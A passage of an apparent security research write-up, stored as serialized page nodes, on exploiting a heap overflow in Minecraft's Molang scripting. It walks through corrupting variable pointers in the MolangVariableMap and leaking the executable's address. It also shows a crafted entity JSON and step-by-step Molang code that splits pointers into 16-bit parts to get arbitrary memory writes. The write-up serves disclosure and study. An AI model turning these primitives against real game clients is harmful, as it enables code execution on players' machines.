",{"type":28,"tag":98,"props":153016,"children":153018},{"className":153017},[],[153019],{"type":33,"value":152472},{"type":33,"value":153021}," from the start of the ",{"type":28,"tag":98,"props":153023,"children":153025},{"className":153024},[],[153026],{"type":33,"value":152538},{"type":33,"value":153028}," (which in this diagram corresponds to ",{"type":28,"tag":98,"props":153030,"children":153032},{"className":153031},[],[153033],{"type":33,"value":153034},"variable.f",{"type":33,"value":153036},"), and writing to ",{"type":28,"tag":98,"props":153038,"children":153040},{"className":153039},[],[153041],{"type":33,"value":152964},{"type":33,"value":153043}," will overwrite that pointer - corrupting ",{"type":28,"tag":98,"props":153045,"children":153047},{"className":153046},[],[153048],{"type":33,"value":153034},{"type":33,"value":141},{"type":28,"tag":29,"props":153051,"children":153052},{},[153053,153055,153060,153061,153067,153069,153074,153076,153082,153084,153089,153091,153096,153098,153104,153106,153112,153114,153119],{"type":33,"value":153054},"To leak the address of the Minecraft executable we could increment ",{"type":28,"tag":98,"props":153056,"children":153058},{"className":153057},[],[153059],{"type":33,"value":152964},{"type":33,"value":269},{"type":28,"tag":98,"props":153062,"children":153064},{"className":153063},[],[153065],{"type":33,"value":153066},"variable.a += 8",{"type":33,"value":153068},"), which advances the pointer used for ",{"type":28,"tag":98,"props":153070,"children":153072},{"className":153071},[],[153073],{"type":33,"value":153034},{"type":33,"value":153075}," by 8 bytes. The Molang script would repeat this until it finds a vtable pointer in the heap. At that point we can write arbitrary values into writable regions of the Minecraft process by setting ",{"type":28,"tag":98,"props":153077,"children":153079},{"className":153078},[],[153080],{"type":33,"value":153081},"variable.a = variable.exe_leak + \u003Coffset>",{"type":33,"value":153083}," - this updates the ",{"type":28,"tag":98,"props":153085,"children":153087},{"className":153086},[],[153088],{"type":33,"value":153034},{"type":33,"value":153090}," pointer to our chosen address, and writing to ",{"type":28,"tag":98,"props":153092,"children":153094},{"className":153093},[],[153095],{"type":33,"value":153034},{"type":33,"value":153097},", for example ",{"type":28,"tag":98,"props":153099,"children":153101},{"className":153100},[],[153102],{"type":33,"value":153103},"variable.f = 1337",{"type":33,"value":153105},", writes the value ",{"type":28,"tag":98,"props":153107,"children":153109},{"className":153108},[],[153110],{"type":33,"value":153111},"1337",{"type":33,"value":153113}," to offset ",{"type":28,"tag":98,"props":153115,"children":153117},{"className":153116},[],[153118],{"type":33,"value":152472},{"type":33,"value":153120}," from that calculated address.",{"type":28,"tag":443,"props":153122,"children":153124},{"id":153123},"testing-the-idea",[153125],{"type":33,"value":153126},"Testing the Idea",{"type":28,"tag":29,"props":153128,"children":153129},{},[153130,153132,153137,153139,153144,153146,153151],{"type":33,"value":153131},"We tested the idea by manually adding a pointer to the start of ",{"type":28,"tag":98,"props":153133,"children":153135},{"className":153134},[],[153136],{"type":33,"value":152538},{"type":33,"value":153138}," and modifying the index of a variable so that it indexed this out-of-bounds pointer. It ",{"type":28,"tag":2583,"props":153140,"children":153141},{},[153142],{"type":33,"value":153143},"almost",{"type":33,"value":153145}," worked - below is the state of the ",{"type":28,"tag":98,"props":153147,"children":153149},{"className":153148},[],[153150],{"type":33,"value":152538},{"type":33,"value":153152},"'s allocated buffer before the Molang script executes:",{"type":28,"tag":29,"props":153154,"children":153155},{},[153156],{"type":28,"tag":206,"props":153157,"children":153159},{"alt":50198,"src":153158},"/posts/minecraft-heap-overflow-to-rce/image9.png",[],{"type":28,"tag":29,"props":153161,"children":153162},{},[153163],{"type":33,"value":153164},"And this is after execution:",{"type":28,"tag":29,"props":153166,"children":153167},{},[153168],{"type":28,"tag":206,"props":153169,"children":153171},{"alt":50198,"src":153170},"/posts/minecraft-heap-overflow-to-rce/image10.png",[],{"type":28,"tag":29,"props":153173,"children":153174},{},[153175],{"type":33,"value":153176},"For reference, this is what the relevant entity json file containing our Molang looks like:",{"type":28,"tag":234,"props":153178,"children":153180},{"code":153179,"language":33632,"meta":7,"className":33630,"style":7},"{\n  \"format_version\": \"1.10.0\",\n  \"minecraft:client_entity\": {\n    \"description\": {\n      \"identifier\": \"minecraft:leash_knot\",\n\n      [...]\n        \n      \"scripts\": {\n        \"initialize\": [\n          \"variable.a = 0;\",\n          \"variable.b = 0;\",\n          \"variable.c = 0;\",\n          [...]\n        ],\n        \"pre_animation\": [\n          \"variable.a = 2.310732e-27;\"\n        ]\n      },\n    }\n  }\n}\n",[153181],{"type":28,"tag":98,"props":153182,"children":153183},{"__ignoreMap":7},[153184,153191,153212,153224,153236,153257,153264,153271,153278,153290,153303,153315,153327,153339,153355,153362,153374,153382,153390,153397,153404,153411],{"type":28,"tag":116,"props":153185,"children":153186},{"class":245,"line":246},[153187],{"type":28,"tag":116,"props":153188,"children":153189},{"style":266},[153190],{"type":33,"value":10547},{"type":28,"tag":116,"props":153192,"children":153193},{"class":245,"line":256},[153194,153199,153203,153208],{"type":28,"tag":116,"props":153195,"children":153196},{"style":272},[153197],{"type":33,"value":153198},"  \"format_version\"",{"type":28,"tag":116,"props":153200,"children":153201},{"style":266},[153202],{"type":33,"value":14994},{"type":28,"tag":116,"props":153204,"children":153205},{"style":563},[153206],{"type":33,"value":153207},"\"1.10.0\"",{"type":28,"tag":116,"props":153209,"children":153210},{"style":266},[153211],{"type":33,"value":3178},{"type":28,"tag":116,"props":153213,"children":153214},{"class":245,"line":293},[153215,153220],{"type":28,"tag":116,"props":153216,"children":153217},{"style":272},[153218],{"type":33,"value":153219},"  \"minecraft:client_entity\"",{"type":28,"tag":116,"props":153221,"children":153222},{"style":266},[153223],{"type":33,"value":36646},{"type":28,"tag":116,"props":153225,"children":153226},{"class":245,"line":361},[153227,153232],{"type":28,"tag":116,"props":153228,"children":153229},{"style":272},[153230],{"type":33,"value":153231},"    \"description\"",{"type":28,"tag":116,"props":153233,"children":153234},{"style":266},[153235],{"type":33,"value":36646},{"type":28,"tag":116,"props":153237,"children":153238},{"class":245,"line":387},[153239,153244,153248,153253],{"type":28,"tag":116,"props":153240,"children":153241},{"style":272},[153242],{"type":33,"value":153243},"      \"identifier\"",{"type":28,"tag":116,"props":153245,"children":153246},{"style":266},[153247],{"type":33,"value":14994},{"type":28,"tag":116,"props":153249,"children":153250},{"style":563},[153251],{"type":33,"value":153252},"\"minecraft:leash_knot\"",{"type":28,"tag":116,"props":153254,"children":153255},{"style":266},[153256],{"type":33,"value":3178},{"type":28,"tag":116,"props":153258,"children":153259},{"class":245,"line":400},[153260],{"type":28,"tag":116,"props":153261,"children":153262},{"emptyLinePlaceholder":19},[153263],{"type":33,"value":1044},{"type":28,"tag":116,"props":153265,"children":153266},{"class":245,"line":614},[153267],{"type":28,"tag":116,"props":153268,"children":153269},{"style":22069},[153270],{"type":33,"value":127054},{"type":28,"tag":116,"props":153272,"children":153273},{"class":245,"line":631},[153274],{"type":28,"tag":116,"props":153275,"children":153276},{"style":266},[153277],{"type":33,"value":152361},{"type":28,"tag":116,"props":153279,"children":153280},{"class":245,"line":665},[153281,153286],{"type":28,"tag":116,"props":153282,"children":153283},{"style":272},[153284],{"type":33,"value":153285},"      \"scripts\"",{"type":28,"tag":116,"props":153287,"children":153288},{"style":266},[153289],{"type":33,"value":36646},{"type":28,"tag":116,"props":153291,"children":153292},{"class":245,"line":713},[153293,153298],{"type":28,"tag":116,"props":153294,"children":153295},{"style":272},[153296],{"type":33,"value":153297},"        \"initialize\"",{"type":28,"tag":116,"props":153299,"children":153300},{"style":266},[153301],{"type":33,"value":153302},": [\n",{"type":28,"tag":116,"props":153304,"children":153305},{"class":245,"line":750},[153306,153311],{"type":28,"tag":116,"props":153307,"children":153308},{"style":563},[153309],{"type":33,"value":153310},"          \"variable.a = 0;\"",{"type":28,"tag":116,"props":153312,"children":153313},{"style":266},[153314],{"type":33,"value":3178},{"type":28,"tag":116,"props":153316,"children":153317},{"class":245,"line":779},[153318,153323],{"type":28,"tag":116,"props":153319,"children":153320},{"style":563},[153321],{"type":33,"value":153322},"          \"variable.b = 0;\"",{"type":28,"tag":116,"props":153324,"children":153325},{"style":266},[153326],{"type":33,"value":3178},{"type":28,"tag":116,"props":153328,"children":153329},{"class":245,"line":796},[153330,153335],{"type":28,"tag":116,"props":153331,"children":153332},{"style":563},[153333],{"type":33,"value":153334},"          \"variable.c = 0;\"",{"type":28,"tag":116,"props":153336,"children":153337},{"style":266},[153338],{"type":33,"value":3178},{"type":28,"tag":116,"props":153340,"children":153341},{"class":245,"line":847},[153342,153347,153351],{"type":28,"tag":116,"props":153343,"children":153344},{"style":266},[153345],{"type":33,"value":153346},"          [",{"type":28,"tag":116,"props":153348,"children":153349},{"style":22069},[153350],{"type":33,"value":9259},{"type":28,"tag":116,"props":153352,"children":153353},{"style":266},[153354],{"type":33,"value":11440},{"type":28,"tag":116,"props":153356,"children":153357},{"class":245,"line":898},[153358],{"type":28,"tag":116,"props":153359,"children":153360},{"style":266},[153361],{"type":33,"value":43271},{"type":28,"tag":116,"props":153363,"children":153364},{"class":245,"line":907},[153365,153370],{"type":28,"tag":116,"props":153366,"children":153367},{"style":272},[153368],{"type":33,"value":153369},"        \"pre_animation\"",{"type":28,"tag":116,"props":153371,"children":153372},{"style":266},[153373],{"type":33,"value":153302},{"type":28,"tag":116,"props":153375,"children":153376},{"class":245,"line":981},[153377],{"type":28,"tag":116,"props":153378,"children":153379},{"style":563},[153380],{"type":33,"value":153381},"          \"variable.a = 2.310732e-27;\"\n",{"type":28,"tag":116,"props":153383,"children":153384},{"class":245,"line":1011},[153385],{"type":28,"tag":116,"props":153386,"children":153387},{"style":266},[153388],{"type":33,"value":153389},"        ]\n",{"type":28,"tag":116,"props":153391,"children":153392},{"class":245,"line":1029},[153393],{"type":28,"tag":116,"props":153394,"children":153395},{"style":266},[153396],{"type":33,"value":36823},{"type":28,"tag":116,"props":153398,"children":153399},{"class":245,"line":1038},[153400],{"type":28,"tag":116,"props":153401,"children":153402},{"style":266},[153403],{"type":33,"value":3025},{"type":28,"tag":116,"props":153405,"children":153406},{"class":245,"line":1047},[153407],{"type":28,"tag":116,"props":153408,"children":153409},{"style":266},[153410],{"type":33,"value":5543},{"type":28,"tag":116,"props":153412,"children":153413},{"class":245,"line":1071},[153414],{"type":28,"tag":116,"props":153415,"children":153416},{"style":266},[153417],{"type":33,"value":406},{"type":28,"tag":29,"props":153419,"children":153420},{},[153421,153423,153428,153430,153435,153437,153442],{"type":33,"value":153422},"As shown, the pointer of a variable at offset ",{"type":28,"tag":98,"props":153424,"children":153426},{"className":153425},[],[153427],{"type":33,"value":152472},{"type":33,"value":153429}," was modified and the core concept works. During ",{"type":28,"tag":98,"props":153431,"children":153433},{"className":153432},[],[153434],{"type":33,"value":152430},{"type":33,"value":153436}," copy, pointers of some other variables above offset ",{"type":28,"tag":98,"props":153438,"children":153440},{"className":153439},[],[153441],{"type":33,"value":152472},{"type":33,"value":153443}," were removed, but this is fine as we control these variables and can simply not update them during execution. However, we discovered other issues with this approach.",{"type":28,"tag":29,"props":153445,"children":153446},{},[153447],{"type":33,"value":153448},"As mentioned earlier, the only number type in Molang is a 32-bit float, which causes two major problems:",{"type":28,"tag":2108,"props":153450,"children":153451},{},[153452,153465],{"type":28,"tag":459,"props":153453,"children":153454},{},[153455,153457,153463],{"type":33,"value":153456},"The pointer increment is inconsistent because of ASLR. If the lower 32 bits of the address are larger than ",{"type":28,"tag":98,"props":153458,"children":153460},{"className":153459},[],[153461],{"type":33,"value":153462},"FLT_MAX",{"type":33,"value":153464},", the value becomes an invalid float causing the increment operation to fail.",{"type":28,"tag":459,"props":153466,"children":153467},{},[153468,153470,153475,153477,153482,153483,153488,153490,153495],{"type":33,"value":153469},"As noted before, during assignment, ",{"type":28,"tag":98,"props":153471,"children":153473},{"className":153472},[],[153474],{"type":33,"value":152430},{"type":33,"value":153476}," fields are copied, and the ",{"type":28,"tag":98,"props":153478,"children":153480},{"className":153479},[],[153481],{"type":33,"value":38773},{"type":33,"value":152520},{"type":28,"tag":98,"props":153484,"children":153486},{"className":153485},[],[153487],{"type":33,"value":55253},{"type":33,"value":153489},". Since our source ",{"type":28,"tag":98,"props":153491,"children":153493},{"className":153492},[],[153494],{"type":33,"value":152430},{"type":33,"value":153496}," (calculation rvalue) only has the lower 32 bits populated (due to the 32-bit float type), the upper 32 bits of the destination address are always erased.",{"type":28,"tag":29,"props":153498,"children":153499},{},[153500],{"type":33,"value":153501},"Because of these issues, this idea alone wouldn’t work. We needed to either adjust our approach or come up with an entirely new one.",{"type":28,"tag":443,"props":153503,"children":153505},{"id":153504},"expanding-the-idea",[153506],{"type":33,"value":153507},"Expanding the Idea",{"type":28,"tag":29,"props":153509,"children":153510},{},[153511,153513,153518,153520,153525,153526,153531,153533,153538],{"type":33,"value":153512},"As mentioned earlier, the ",{"type":28,"tag":98,"props":153514,"children":153516},{"className":153515},[],[153517],{"type":33,"value":32394},{"type":33,"value":153519}," field of ",{"type":28,"tag":98,"props":153521,"children":153523},{"className":153522},[],[153524],{"type":33,"value":152430},{"type":33,"value":15106},{"type":28,"tag":98,"props":153527,"children":153529},{"className":153528},[],[153530],{"type":33,"value":57552},{"type":33,"value":153532},". During assignment, the upper 32 bits are not touched and therefore remain uninitialized. This can be observed in the debugger screenshot above - the 32 bits directly below the ",{"type":28,"tag":98,"props":153534,"children":153536},{"className":153535},[],[153537],{"type":33,"value":38773},{"type":33,"value":153539}," field remain unchanged before and after Molang execution.",{"type":28,"tag":29,"props":153541,"children":153542},{},[153543,153545,153550],{"type":33,"value":153544},"Because of this, we thought that we could corrupt two variables instead of just one. The plan was to modify the lower 32 bits of a variable pointer using one corrupted variable, and then restore the upper 32 bits with another corrupted variable pointing to the ",{"type":28,"tag":98,"props":153546,"children":153548},{"className":153547},[],[153549],{"type":33,"value":152538},{"type":33,"value":153551},"’s allocated buffer + 4.",{"type":28,"tag":29,"props":153553,"children":153554},{},[153555,153557,153562,153564,153569,153571,153576,153577,153583],{"type":33,"value":153556},"In the example below, ",{"type":28,"tag":98,"props":153558,"children":153560},{"className":153559},[],[153561],{"type":33,"value":152964},{"type":33,"value":153563}," points to ",{"type":28,"tag":98,"props":153565,"children":153567},{"className":153566},[],[153568],{"type":33,"value":152538},{"type":33,"value":153570},", while ",{"type":28,"tag":98,"props":153572,"children":153574},{"className":153573},[],[153575],{"type":33,"value":152978},{"type":33,"value":153563},{"type":28,"tag":98,"props":153578,"children":153580},{"className":153579},[],[153581],{"type":33,"value":153582},"MolangVariableMap + 4",{"type":33,"value":4160},{"type":28,"tag":234,"props":153585,"children":153587},{"code":153586},"                         variable.f pointer     \n                                 |              \n                   +-------------+-------------+\n                   v                           v\n                                                \n                   +-------------+-------------+\n                   | a0 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^             ^             \n+-------------+     |             |             \n| variable.a  +-----+             |             \n+-------------+                   |             \n| variable.b  +-------------------+                                     \n+-------------+                                 \n|    . . .    |                                 \n",[153588],{"type":28,"tag":98,"props":153589,"children":153590},{"__ignoreMap":7},[153591],{"type":33,"value":153586},{"type":28,"tag":29,"props":153593,"children":153594},{},[153595,153597,153602,153603,153608,153610,153615,153617,153622,153624,153629],{"type":33,"value":153596},"Here, the ",{"type":28,"tag":98,"props":153598,"children":153600},{"className":153599},[],[153601],{"type":33,"value":38773},{"type":33,"value":153519},{"type":28,"tag":98,"props":153604,"children":153606},{"className":153605},[],[153607],{"type":33,"value":152964},{"type":33,"value":153609}," starts at the lower 32 bits of the ",{"type":28,"tag":98,"props":153611,"children":153613},{"className":153612},[],[153614],{"type":33,"value":153034},{"type":33,"value":153616}," pointer, while ",{"type":28,"tag":98,"props":153618,"children":153620},{"className":153619},[],[153621],{"type":33,"value":152978},{"type":33,"value":153623}," starts at the upper 32 bits. This means we can store the upper 32 bits of the ",{"type":28,"tag":98,"props":153625,"children":153627},{"className":153626},[],[153628],{"type":33,"value":153034},{"type":33,"value":153630}," pointer in a separate variable:",{"type":28,"tag":234,"props":153632,"children":153634},{"code":153633},"variable.saved_upper_32 = variable.b;\n",[153635],{"type":28,"tag":98,"props":153636,"children":153637},{"__ignoreMap":7},[153638],{"type":33,"value":153633},{"type":28,"tag":29,"props":153640,"children":153641},{},[153642],{"type":33,"value":153643},"Then we can modify the lower 32 bits of the pointer:",{"type":28,"tag":234,"props":153645,"children":153647},{"code":153646},"variable.a = variable.a + itof(0x8);\n",[153648],{"type":28,"tag":98,"props":153649,"children":153650},{"__ignoreMap":7},[153651],{"type":33,"value":153646},{"type":28,"tag":29,"props":153653,"children":153654},{},[153655],{"type":33,"value":153656},"After this operation, the upper 32 bits are cleared while the lower bits are adjusted:",{"type":28,"tag":234,"props":153658,"children":153660},{"code":153659},"                   +-------------+-------------+\n                   | a8 bb cc dd | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^             ^             \n+-------------+     |             |             \n| variable.a  +-----+             |             \n+-------------+                   |             \n| variable.b  +-------------------+                                     \n+-------------+                                 \n|    . . .    |                                 \n",[153661],{"type":28,"tag":98,"props":153662,"children":153663},{"__ignoreMap":7},[153664],{"type":33,"value":153659},{"type":28,"tag":29,"props":153666,"children":153667},{},[153668,153670,153675],{"type":33,"value":153669},"Since the 32 bits directly below the ",{"type":28,"tag":98,"props":153671,"children":153673},{"className":153672},[],[153674],{"type":33,"value":38773},{"type":33,"value":153676}," field remain untouched during assignment, we can simply restore the upper bits:",{"type":28,"tag":234,"props":153678,"children":153680},{"code":153679},"variable.b = variable.saved_upper_32;\n",[153681],{"type":28,"tag":98,"props":153682,"children":153683},{"__ignoreMap":7},[153684],{"type":33,"value":153679},{"type":28,"tag":29,"props":153686,"children":153687},{},[153688,153690,153695],{"type":33,"value":153689},"Now ",{"type":28,"tag":98,"props":153691,"children":153693},{"className":153692},[],[153694],{"type":33,"value":153034},{"type":33,"value":153696}," pointer is restored and we've incremented it by 8, achieving the desired state:",{"type":28,"tag":234,"props":153698,"children":153700},{"code":153699},"                   +-------------+-------------+\n                   | a8 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^             ^             \n+-------------+     |             |             \n| variable.a  +-----+             |             \n+-------------+                   |             \n| variable.b  +-------------------+                                    \n+-------------+                                 \n|    . . .    |                                 \n",[153701],{"type":28,"tag":98,"props":153702,"children":153703},{"__ignoreMap":7},[153704],{"type":33,"value":153699},{"type":28,"tag":29,"props":153706,"children":153707},{},[153708,153710,153715],{"type":33,"value":153709},"This bypasses the issue of the upper 32 bits being cleared, but raises another question: how do we find a pointer to ",{"type":28,"tag":98,"props":153711,"children":153713},{"className":153712},[],[153714],{"type":33,"value":153582},{"type":33,"value":153716}," on the heap?",{"type":28,"tag":29,"props":153718,"children":153719},{},[153720,153722,153727,153729,153735],{"type":33,"value":153721},"Additionally, adding 8 to ",{"type":28,"tag":98,"props":153723,"children":153725},{"className":153724},[],[153726],{"type":33,"value":152964},{"type":33,"value":153728}," in the example above wouldn’t work because ",{"type":28,"tag":98,"props":153730,"children":153732},{"className":153731},[],[153733],{"type":33,"value":153734},"0xddccbba0",{"type":33,"value":153736}," is not a valid float. So the first issue still remains unresolved.",{"type":28,"tag":443,"props":153738,"children":153740},{"id":153739},"the-final-approach",[153741],{"type":33,"value":153742},"The Final Approach",{"type":28,"tag":29,"props":153744,"children":153745},{},[153746,153748,153753,153755,153761],{"type":33,"value":153747},"We realized that instead of having the second pointer at ",{"type":28,"tag":98,"props":153749,"children":153751},{"className":153750},[],[153752],{"type":33,"value":153582},{"type":33,"value":153754},", we could instead have it at ",{"type":28,"tag":98,"props":153756,"children":153758},{"className":153757},[],[153759],{"type":33,"value":153760},"MolangVariableMap + 2",{"type":33,"value":153762},", which would resolve both of our issues.",{"type":28,"tag":29,"props":153764,"children":153765},{},[153766,153768,153773,153774,153779],{"type":33,"value":153767},"Let’s revisit the previous example, but this time ",{"type":28,"tag":98,"props":153769,"children":153771},{"className":153770},[],[153772],{"type":33,"value":152978},{"type":33,"value":153563},{"type":28,"tag":98,"props":153775,"children":153777},{"className":153776},[],[153778],{"type":33,"value":153760},{"type":33,"value":4160},{"type":28,"tag":234,"props":153781,"children":153783},{"code":153782},"                   +-------------+-------------+\n                   | a0 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                             \n+-------------+                                 \n|    . . .    |                                 \n",[153784],{"type":28,"tag":98,"props":153785,"children":153786},{"__ignoreMap":7},[153787],{"type":33,"value":153782},{"type":28,"tag":29,"props":153789,"children":153790},{},[153791,153793,153798],{"type":33,"value":153792},"With this setup, we can calculate any address relative to ",{"type":28,"tag":98,"props":153794,"children":153796},{"className":153795},[],[153797],{"type":33,"value":153034},{"type":33,"value":153799}," by first saving the upper 48 bits of the address:",{"type":28,"tag":234,"props":153801,"children":153803},{"code":153802},"variable.saved_upper_48 = variable.b;\n",[153804],{"type":28,"tag":98,"props":153805,"children":153806},{"__ignoreMap":7},[153807],{"type":33,"value":153802},{"type":28,"tag":29,"props":153809,"children":153810},{},[153811,153812,153818,153820,153826],{"type":33,"value":129443},{"type":28,"tag":98,"props":153813,"children":153815},{"className":153814},[],[153816],{"type":33,"value":153817},"variable.saved_upper_48",{"type":33,"value":153819}," holds the value ",{"type":28,"tag":98,"props":153821,"children":153823},{"className":153822},[],[153824],{"type":33,"value":153825},"0x1c80ddcc",{"type":33,"value":141},{"type":28,"tag":29,"props":153828,"children":153829},{},[153830],{"type":33,"value":153831},"To fix our earlier problem of being unable to increment invalid float values, we can simply clear the upper 48 bits:",{"type":28,"tag":234,"props":153833,"children":153835},{"code":153834},"variable.b = 0;\n",[153836],{"type":28,"tag":98,"props":153837,"children":153838},{"__ignoreMap":7},[153839],{"type":33,"value":153834},{"type":28,"tag":29,"props":153841,"children":153842},{},[153843],{"type":33,"value":153844},"Resulting in the following state:",{"type":28,"tag":234,"props":153846,"children":153848},{"code":153847},"                   +-------------+-------------+\n                   | a0 bb 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                            \n+-------------+                                 \n|    . . .    |                                 \n",[153849],{"type":28,"tag":98,"props":153850,"children":153851},{"__ignoreMap":7},[153852],{"type":33,"value":153847},{"type":28,"tag":29,"props":153854,"children":153855},{},[153856,153858,153863,153865,153871,153873,153878],{"type":33,"value":153857},"Now, the value of ",{"type":28,"tag":98,"props":153859,"children":153861},{"className":153860},[],[153862],{"type":33,"value":152964},{"type":33,"value":153864}," only spans 16 bits (",{"type":28,"tag":98,"props":153866,"children":153868},{"className":153867},[],[153869],{"type":33,"value":153870},"0xbba0",{"type":33,"value":153872}," specifically), which is always a valid float since it’s far below ",{"type":28,"tag":98,"props":153874,"children":153876},{"className":153875},[],[153877],{"type":33,"value":153462},{"type":33,"value":141},{"type":28,"tag":29,"props":153880,"children":153881},{},[153882,153884,153889],{"type":33,"value":153883},"We can now safely adjust the lower 16 bits of the pointer by incrementing ",{"type":28,"tag":98,"props":153885,"children":153887},{"className":153886},[],[153888],{"type":33,"value":152964},{"type":33,"value":4160},{"type":28,"tag":234,"props":153891,"children":153892},{"code":153646},[153893],{"type":28,"tag":98,"props":153894,"children":153895},{"__ignoreMap":7},[153896],{"type":33,"value":153646},{"type":28,"tag":29,"props":153898,"children":153899},{},[153900],{"type":33,"value":153901},"Which results in:",{"type":28,"tag":234,"props":153903,"children":153905},{"code":153904},"                   +-------------+-------------+\n                   | a8 bb 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                            \n+-------------+                                 \n|    . . .    |                                 \n",[153906],{"type":28,"tag":98,"props":153907,"children":153908},{"__ignoreMap":7},[153909],{"type":33,"value":153904},{"type":28,"tag":29,"props":153911,"children":153912},{},[153913],{"type":33,"value":153914},"If we only wanted to increment the pointer by 8, we could finish by restoring the upper 48 bits:",{"type":28,"tag":234,"props":153916,"children":153918},{"code":153917},"variable.b = variable.saved_upper_48;\n",[153919],{"type":28,"tag":98,"props":153920,"children":153921},{"__ignoreMap":7},[153922],{"type":33,"value":153917},{"type":28,"tag":29,"props":153924,"children":153925},{},[153926],{"type":33,"value":153927},"Yielding a valid pointer again:",{"type":28,"tag":234,"props":153929,"children":153931},{"code":153930},"                   +-------------+-------------+\n                   | a8 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                             \n+-------------+                                 \n|    . . .    |                                 \n",[153932],{"type":28,"tag":98,"props":153933,"children":153934},{"__ignoreMap":7},[153935],{"type":33,"value":153930},{"type":28,"tag":29,"props":153937,"children":153938},{},[153939],{"type":33,"value":153940},"However, if we wanted to increment the pointer by a value larger than 16 bits can represent, we would continue by first saving the adjusted lower 16 bits:",{"type":28,"tag":234,"props":153942,"children":153944},{"code":153943},"variable.saved_adjusted_lower_16 = variable.a;\n",[153945],{"type":28,"tag":98,"props":153946,"children":153947},{"__ignoreMap":7},[153948],{"type":33,"value":153943},{"type":28,"tag":29,"props":153950,"children":153951},{},[153952],{"type":33,"value":153953},"Next, we need to extract the middle and upper 16 bits of the address. We start by restoring the previously saved upper 48 bits:",{"type":28,"tag":234,"props":153955,"children":153957},{"code":153956},"variable.a = variable.saved_upper_48;\n",[153958],{"type":28,"tag":98,"props":153959,"children":153960},{"__ignoreMap":7},[153961],{"type":33,"value":153956},{"type":28,"tag":29,"props":153963,"children":153964},{},[153965],{"type":33,"value":153966},"This produces the following state:",{"type":28,"tag":234,"props":153968,"children":153970},{"code":153969},"                   +-------------+-------------+\n                   | cc dd 80 1c | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    |                                 \n",[153971],{"type":28,"tag":98,"props":153972,"children":153973},{"__ignoreMap":7},[153974],{"type":33,"value":153969},{"type":28,"tag":29,"props":153976,"children":153977},{},[153978,153980,153985,153987,153993,153995,154001,154003,154008,154010,154015],{"type":33,"value":153979},"As shown, ",{"type":28,"tag":98,"props":153981,"children":153983},{"className":153982},[],[153984],{"type":33,"value":152978},{"type":33,"value":153986}," now contains the upper 16 bits of the address (",{"type":28,"tag":98,"props":153988,"children":153990},{"className":153989},[],[153991],{"type":33,"value":153992},"0x1c80",{"type":33,"value":153994},"), which we can store as ",{"type":28,"tag":98,"props":153996,"children":153998},{"className":153997},[],[153999],{"type":33,"value":154000},"variable.saved_upper_16 = variable.b",{"type":33,"value":154002},". Meanwhile, ",{"type":28,"tag":98,"props":154004,"children":154006},{"className":154005},[],[154007],{"type":33,"value":152964},{"type":33,"value":154009}," contains both the middle and upper 16 bits. To isolate the middle bits, we simply clear ",{"type":28,"tag":98,"props":154011,"children":154013},{"className":154012},[],[154014],{"type":33,"value":152978},{"type":33,"value":4160},{"type":28,"tag":234,"props":154017,"children":154018},{"code":153834},[154019],{"type":28,"tag":98,"props":154020,"children":154021},{"__ignoreMap":7},[154022],{"type":33,"value":153834},{"type":28,"tag":29,"props":154024,"children":154025},{},[154026],{"type":33,"value":154027},"Leaving us with:",{"type":28,"tag":234,"props":154029,"children":154031},{"code":154030},"                   +-------------+-------------+\n                   | cc dd 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    |                                 \n",[154032],{"type":28,"tag":98,"props":154033,"children":154034},{"__ignoreMap":7},[154035],{"type":33,"value":154030},{"type":28,"tag":29,"props":154037,"children":154038},{},[154039],{"type":33,"value":154040},"We can now save the middle 16 bits:",{"type":28,"tag":234,"props":154042,"children":154044},{"code":154043},"variable.saved_middle_16 = variable.a;\n",[154045],{"type":28,"tag":98,"props":154046,"children":154047},{"__ignoreMap":7},[154048],{"type":33,"value":154043},{"type":28,"tag":29,"props":154050,"children":154051},{},[154052],{"type":33,"value":154053},"At this point, we have:",{"type":28,"tag":234,"props":154055,"children":154057},{"code":154056},"variable.saved_adjusted_lower_16 = 0xbba8\nvariable.saved_middle_16 = 0xddcc\nvariable.saved_upper_16 = 0x1c80\n",[154058],{"type":28,"tag":98,"props":154059,"children":154060},{"__ignoreMap":7},[154061],{"type":33,"value":154056},{"type":28,"tag":29,"props":154063,"children":154064},{},[154065],{"type":33,"value":154066},"All three parts are valid float values, ensuring deterministic calculations.",{"type":28,"tag":29,"props":154068,"children":154069},{},[154070],{"type":33,"value":154071},"If we needed to increment the pointer by more than the maximum 16-bit value, we would simply increment the middle and upper parts accordingly:",{"type":28,"tag":234,"props":154073,"children":154075},{"code":154074},"variable.saved_adjusted_middle_16 = variable.saved_middle_16 + itof(0x1);\nvariable.saved_adjusted_upper_16 = variable.saved_upper_16 + itof(0x1);\n",[154076],{"type":28,"tag":98,"props":154077,"children":154078},{"__ignoreMap":7},[154079],{"type":33,"value":154074},{"type":28,"tag":29,"props":154081,"children":154082},{},[154083],{"type":33,"value":154084},"After modifying the three 16-bit parts, we can reconstruct the full pointer by reversing the extraction process. We start by forging the upper 48 bits:",{"type":28,"tag":234,"props":154086,"children":154088},{"code":154087},"variable.a = variable.saved_adjusted_middle_16;\n",[154089],{"type":28,"tag":98,"props":154090,"children":154091},{"__ignoreMap":7},[154092],{"type":33,"value":154087},{"type":28,"tag":29,"props":154094,"children":154095},{},[154096,154098,154103,154104,154110,154111,154117],{"type":33,"value":154097},"Setting 